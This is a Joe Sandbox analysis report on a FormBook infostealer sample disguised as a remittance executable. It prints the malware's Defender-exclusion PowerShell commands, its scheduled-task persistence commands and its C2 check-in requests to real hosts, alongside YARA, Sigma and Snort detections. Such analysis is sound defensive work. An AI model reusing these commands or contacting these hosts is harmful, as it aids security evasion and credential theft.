Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
4TH HIRE SOA REMITTANCE_USD280,000.exe

Overview

General Information

Sample name:4TH HIRE SOA REMITTANCE_USD280,000.exe
Analysis ID:1447924
MD5:7bfc6728400d041f90f6dd5b3f67aa38
SHA1:e3dfa3816a4b4fa3c4e7146953f1cc7debb84be8
SHA256:92ef596e60597ec73400540ce819005b4d0ca33716ae9f0129547b119415e1d9
Tags:exe
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Snort IDS alert for network traffic
Yara detected AntiVM3
Yara detected FormBook
.NET source code contains potential unpacker
.NET source code contains very large array initializations
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Found direct / indirect Syscall (likely to bypass EDR)
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Suspicious Process Parents
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • 4TH HIRE SOA REMITTANCE_USD280,000.exe (PID: 7112 cmdline: "C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exe" MD5: 7BFC6728400D041F90F6DD5B3F67AA38)
    • powershell.exe (PID: 2172 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 5544 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 4428 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\GRogNEHvcL.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 4112 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 7348 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • schtasks.exe (PID: 4012 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\GRogNEHvcL" /XML "C:\Users\user\AppData\Local\Temp\tmp16FF.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 1848 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • 4TH HIRE SOA REMITTANCE_USD280,000.exe (PID: 7232 cmdline: "C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exe" MD5: 7BFC6728400D041F90F6DD5B3F67AA38)
      • vFRZZQiLgeOQDzGymvZVa.exe (PID: 6380 cmdline: "C:\Program Files (x86)\SsffkNIowRsReJBYlDZpsAqXDiYZSMDNIfLoWWAcjuRlhiYNTxfcNBJnSqzyGrAHTAT\vFRZZQiLgeOQDzGymvZVa.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • winver.exe (PID: 7780 cmdline: "C:\Windows\SysWOW64\winver.exe" MD5: B5471B0FB5402FC318C82C994C6BF84D)
          • vFRZZQiLgeOQDzGymvZVa.exe (PID: 6408 cmdline: "C:\Program Files (x86)\SsffkNIowRsReJBYlDZpsAqXDiYZSMDNIfLoWWAcjuRlhiYNTxfcNBJnSqzyGrAHTAT\vFRZZQiLgeOQDzGymvZVa.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 8052 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • GRogNEHvcL.exe (PID: 7280 cmdline: C:\Users\user\AppData\Roaming\GRogNEHvcL.exe MD5: 7BFC6728400D041F90F6DD5B3F67AA38)
    • schtasks.exe (PID: 7484 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\GRogNEHvcL" /XML "C:\Users\user\AppData\Local\Temp\tmp30FF.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7492 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • GRogNEHvcL.exe (PID: 7528 cmdline: "C:\Users\user\AppData\Roaming\GRogNEHvcL.exe" MD5: 7BFC6728400D041F90F6DD5B3F67AA38)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000009.00000002.2334768976.0000000001AB0000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000009.00000002.2334768976.0000000001AB0000.00000040.10000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x2ac00:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x141af:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    00000009.00000002.2332025821.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000009.00000002.2332025821.0000000000400000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x2dbf3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x171a2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      00000011.00000002.4495210628.0000000004C40000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        Click to see the 13 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        9.2.4TH HIRE SOA REMITTANCE_USD280,000.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          9.2.4TH HIRE SOA REMITTANCE_USD280,000.exe.400000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x2dbf3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x171a2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          9.2.4TH HIRE SOA REMITTANCE_USD280,000.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            9.2.4TH HIRE SOA REMITTANCE_USD280,000.exe.400000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
            • 0x2cdf3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
            • 0x163a2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exe", ParentImage: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exe, ParentProcessId: 7112, ParentProcessName: 4TH HIRE SOA REMITTANCE_USD280,000.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exe", ProcessId: 2172, ProcessName: powershell.exe
            Sigma detected: Suspicious Process Parents
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Program Files (x86)\SsffkNIowRsReJBYlDZpsAqXDiYZSMDNIfLoWWAcjuRlhiYNTxfcNBJnSqzyGrAHTAT\vFRZZQiLgeOQDzGymvZVa.exe" , CommandLine: "C:\Program Files (x86)\SsffkNIowRsReJBYlDZpsAqXDiYZSMDNIfLoWWAcjuRlhiYNTxfcNBJnSqzyGrAHTAT\vFRZZQiLgeOQDzGymvZVa.exe" , CommandLine|base64offset|contains: )^, Image: C:\Program Files (x86)\SsffkNIowRsReJBYlDZpsAqXDiYZSMDNIfLoWWAcjuRlhiYNTxfcNBJnSqzyGrAHTAT\vFRZZQiLgeOQDzGymvZVa.exe, NewProcessName: C:\Program Files (x86)\SsffkNIowRsReJBYlDZpsAqXDiYZSMDNIfLoWWAcjuRlhiYNTxfcNBJnSqzyGrAHTAT\vFRZZQiLgeOQDzGymvZVa.exe, OriginalFileName: C:\Program Files (x86)\SsffkNIowRsReJBYlDZpsAqXDiYZSMDNIfLoWWAcjuRlhiYNTxfcNBJnSqzyGrAHTAT\vFRZZQiLgeOQDzGymvZVa.exe, ParentCommandLine: "C:\Windows\SysWOW64\winver.exe", ParentImage: C:\Windows\SysWOW64\winver.exe, ParentProcessId: 7780, ParentProcessName: winver.exe, ProcessCommandLine: "C:\Program Files (x86)\SsffkNIowRsReJBYlDZpsAqXDiYZSMDNIfLoWWAcjuRlhiYNTxfcNBJnSqzyGrAHTAT\vFRZZQiLgeOQDzGymvZVa.exe" , ProcessId: 6408, ProcessName: vFRZZQiLgeOQDzGymvZVa.exe
            Sigma detected: Powershell Defender Exclusion
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exe", ParentImage: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exe, ParentProcessId: 7112, ParentProcessName: 4TH HIRE SOA REMITTANCE_USD280,000.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exe", ProcessId: 2172, ProcessName: powershell.exe
            Sigma detected: Suspicious Add Scheduled Task Parent
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\GRogNEHvcL" /XML "C:\Users\user\AppData\Local\Temp\tmp30FF.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\GRogNEHvcL" /XML "C:\Users\user\AppData\Local\Temp\tmp30FF.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\GRogNEHvcL.exe, ParentImage: C:\Users\user\AppData\Roaming\GRogNEHvcL.exe, ParentProcessId: 7280, ParentProcessName: GRogNEHvcL.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\GRogNEHvcL" /XML "C:\Users\user\AppData\Local\Temp\tmp30FF.tmp", ProcessId: 7484, ProcessName: schtasks.exe
            Sigma detected: Suspicious Schtasks From Env Var Folder
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\GRogNEHvcL" /XML "C:\Users\user\AppData\Local\Temp\tmp16FF.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\GRogNEHvcL" /XML "C:\Users\user\AppData\Local\Temp\tmp16FF.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exe", ParentImage: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exe, ParentProcessId: 7112, ParentProcessName: 4TH HIRE SOA REMITTANCE_USD280,000.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\GRogNEHvcL" /XML "C:\Users\user\AppData\Local\Temp\tmp16FF.tmp", ProcessId: 4012, ProcessName: schtasks.exe
            Sigma detected: Non Interactive PowerShell Process Spawned
            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exe", ParentImage: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exe, ParentProcessId: 7112, ParentProcessName: 4TH HIRE SOA REMITTANCE_USD280,000.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exe", ProcessId: 2172, ProcessName: powershell.exe

            Persistence and Installation Behavior

            barindex
            Sigma detected: Scheduled temp file as task from temp location
            Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\GRogNEHvcL" /XML "C:\Users\user\AppData\Local\Temp\tmp16FF.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\GRogNEHvcL" /XML "C:\Users\user\AppData\Local\Temp\tmp16FF.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exe", ParentImage: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exe, ParentProcessId: 7112, ParentProcessName: 4TH HIRE SOA REMITTANCE_USD280,000.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\GRogNEHvcL" /XML "C:\Users\user\AppData\Local\Temp\tmp16FF.tmp", ProcessId: 4012, ProcessName: schtasks.exe

            Snort Signatures

            Timestamp:05/27/24-12:43:42.301762
            SID:2855465
            Source Port:49727
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/27/24-12:44:39.831891
            SID:2855465
            Source Port:49743
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/27/24-12:42:49.943654
            SID:2855465
            Source Port:49714
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/27/24-12:44:53.365787
            SID:2855465
            Source Port:49747
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/27/24-12:44:11.323120
            SID:2855465
            Source Port:49735
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/27/24-12:44:24.871394
            SID:2855465
            Source Port:49739
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/27/24-12:45:49.969014
            SID:2855465
            Source Port:49763
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/27/24-12:43:29.047327
            SID:2855465
            Source Port:49723
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/27/24-12:46:03.256364
            SID:2855465
            Source Port:49767
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/27/24-12:45:07.664711
            SID:2855465
            Source Port:49751
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/27/24-12:43:13.994642
            SID:2855465
            Source Port:49719
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/27/24-12:45:21.505394
            SID:2855465
            Source Port:49755
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/27/24-12:43:57.157571
            SID:2855465
            Source Port:49731
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/27/24-12:45:36.194501
            SID:2855465
            Source Port:49759
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Multi AV Scanner detection for dropped file
            Source: C:\Users\user\AppData\Roaming\GRogNEHvcL.exeReversingLabs: Detection: 42%
            Multi AV Scanner detection for submitted file
            Source: 4TH HIRE SOA REMITTANCE_USD280,000.exeReversingLabs: Detection: 42%
            Source: 4TH HIRE SOA REMITTANCE_USD280,000.exeVirustotal: Detection: 54%Perma Link
            Yara detected FormBook
            Source: Yara matchFile source: 9.2.4TH HIRE SOA REMITTANCE_USD280,000.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 9.2.4TH HIRE SOA REMITTANCE_USD280,000.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000009.00000002.2334768976.0000000001AB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.2332025821.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000011.00000002.4495210628.0000000004C40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000012.00000002.4497473931.0000000005920000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000011.00000002.4495268104.0000000004C80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000011.00000002.4493681409.0000000002D20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.2334955851.0000000001C50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000002.4495209551.00000000026F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Machine Learning detection for dropped file
            Source: C:\Users\user\AppData\Roaming\GRogNEHvcL.exeJoe Sandbox ML: detected
            Machine Learning detection for sample
            Source: 4TH HIRE SOA REMITTANCE_USD280,000.exeJoe Sandbox ML: detected
            Source: 4TH HIRE SOA REMITTANCE_USD280,000.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: 4TH HIRE SOA REMITTANCE_USD280,000.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: winver.pdb source: 4TH HIRE SOA REMITTANCE_USD280,000.exe, 00000009.00000002.2332718421.0000000001307000.00000004.00000020.00020000.00000000.sdmp, vFRZZQiLgeOQDzGymvZVa.exe, 00000010.00000002.4494386152.00000000009F8000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: vFRZZQiLgeOQDzGymvZVa.exe, 00000010.00000000.2259718718.0000000000F0E000.00000002.00000001.01000000.0000000E.sdmp, vFRZZQiLgeOQDzGymvZVa.exe, 00000012.00000002.4493691348.0000000000F0E000.00000002.00000001.01000000.0000000E.sdmp
            Source: Binary string: wntdll.pdbUGP source: 4TH HIRE SOA REMITTANCE_USD280,000.exe, 00000009.00000002.2333103753.0000000001760000.00000040.00001000.00020000.00000000.sdmp, winver.exe, 00000011.00000003.2334615268.0000000004CFC000.00000004.00000020.00020000.00000000.sdmp, winver.exe, 00000011.00000002.4495476148.000000000504E000.00000040.00001000.00020000.00000000.sdmp, winver.exe, 00000011.00000003.2332306459.0000000004B46000.00000004.00000020.00020000.00000000.sdmp, winver.exe, 00000011.00000002.4495476148.0000000004EB0000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: 4TH HIRE SOA REMITTANCE_USD280,000.exe, 4TH HIRE SOA REMITTANCE_USD280,000.exe, 00000009.00000002.2333103753.0000000001760000.00000040.00001000.00020000.00000000.sdmp, winver.exe, 00000011.00000003.2334615268.0000000004CFC000.00000004.00000020.00020000.00000000.sdmp, winver.exe, 00000011.00000002.4495476148.000000000504E000.00000040.00001000.00020000.00000000.sdmp, winver.exe, 00000011.00000003.2332306459.0000000004B46000.00000004.00000020.00020000.00000000.sdmp, winver.exe, 00000011.00000002.4495476148.0000000004EB0000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: winver.pdbGCTL source: 4TH HIRE SOA REMITTANCE_USD280,000.exe, 00000009.00000002.2332718421.0000000001307000.00000004.00000020.00020000.00000000.sdmp, vFRZZQiLgeOQDzGymvZVa.exe, 00000010.00000002.4494386152.00000000009F8000.00000004.00000020.00020000.00000000.sdmp

            Networking

            barindex
            Snort IDS alert for network traffic
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.5:49714 -> 199.59.243.225:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.5:49719 -> 103.138.88.50:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.5:49723 -> 216.40.34.41:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.5:49727 -> 31.31.196.16:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.5:49731 -> 183.181.79.111:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.5:49735 -> 78.142.211.199:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.5:49739 -> 66.29.149.46:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.5:49743 -> 3.125.172.46:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.5:49747 -> 199.59.243.225:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.5:49751 -> 199.59.243.225:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.5:49755 -> 173.254.28.213:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.5:49759 -> 65.181.132.158:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.5:49763 -> 3.33.130.190:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.5:49767 -> 51.195.44.77:80
            Source: Joe Sandbox ViewIP Address: 199.59.243.225 199.59.243.225
            Source: Joe Sandbox ViewIP Address: 66.29.149.46 66.29.149.46
            Source: Joe Sandbox ViewASN Name: SAKURA-CSAKURAInternetIncJP SAKURA-CSAKURAInternetIncJP
            Source: Joe Sandbox ViewASN Name: OVHFR OVHFR
            Source: Joe Sandbox ViewASN Name: PAIR-NETWORKSUS PAIR-NETWORKSUS
            Source: Joe Sandbox ViewASN Name: BODIS-NJUS BODIS-NJUS
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /gasu/?4b34ht=gR1i3bbXa1XbyGNM6Bi8srl2p7nPwmhk9UC1j0Li0VIEHsGUlRc+GvhwvE9+CLKXaHrFrMfO+pZgQjhrKjiTkfzvVWHOu9j6JtqDJOExpSNaoLQHX52jb9GcMlo+0mR5zw==&UxF=2Nflznk0WJ3hjv HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.double.gayConnection: closeUser-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
            Source: global trafficHTTP traffic detected: GET /iqzp/?4b34ht=fu92k1NC4wJFnZcipX/XbPhVhBhXF83hEHBnQGjO4gCDEIQAPcvMGFbAeujwAxJrjpsvX+qRkMbJbRaZT89LHtus1xeGcvR3FY7l2IYkKTCFrV4doYlBH8GHezxeD3NhTg==&UxF=2Nflznk0WJ3hjv HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.duhocvietanh.edu.vnConnection: closeUser-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
